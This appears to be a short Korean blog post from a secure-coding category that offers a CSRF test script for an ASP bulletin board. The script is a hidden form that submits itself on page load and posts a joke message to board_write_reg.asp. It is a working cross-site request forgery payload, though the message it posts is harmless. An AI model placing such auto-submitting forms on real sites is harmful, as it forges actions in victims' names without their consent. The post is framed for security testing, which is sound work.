ASP 게시판에서 CSRF 테스트시 공격스크립트로 사용하세요 ^^
<body>
<form style="display:none" method="post" action="board_write_reg.asp" ENCTYPE="multipart/form-data">
<input type="hidden" name="title" value="임금님귀는 당나귀귀">
<input type="hidden" name="content" value="나만 알고 있으려니 입이 건질거려서.....">
<input type="submit" name="submit" id="send">
</form>
<script>document.forms[0].send.click();</script>
</body>
'보안 > 시큐어코딩' 카테고리의 다른 글
[위협모델링] 솔루션 (0) | 2013.10.21 |
---|---|
[시큐어코딩실습] 파일 업로드 취약점제거 (0) | 2013.10.17 |
CERT Java Secure Coding (0) | 2013.09.26 |
[시큐어코딩] 소프트웨어 개발 보안 과정 참고자료 (0) | 2013.09.10 |
소프트웨어 개발보안(시큐어 코딩) 관련 가이드 (0) | 2013.07.22 |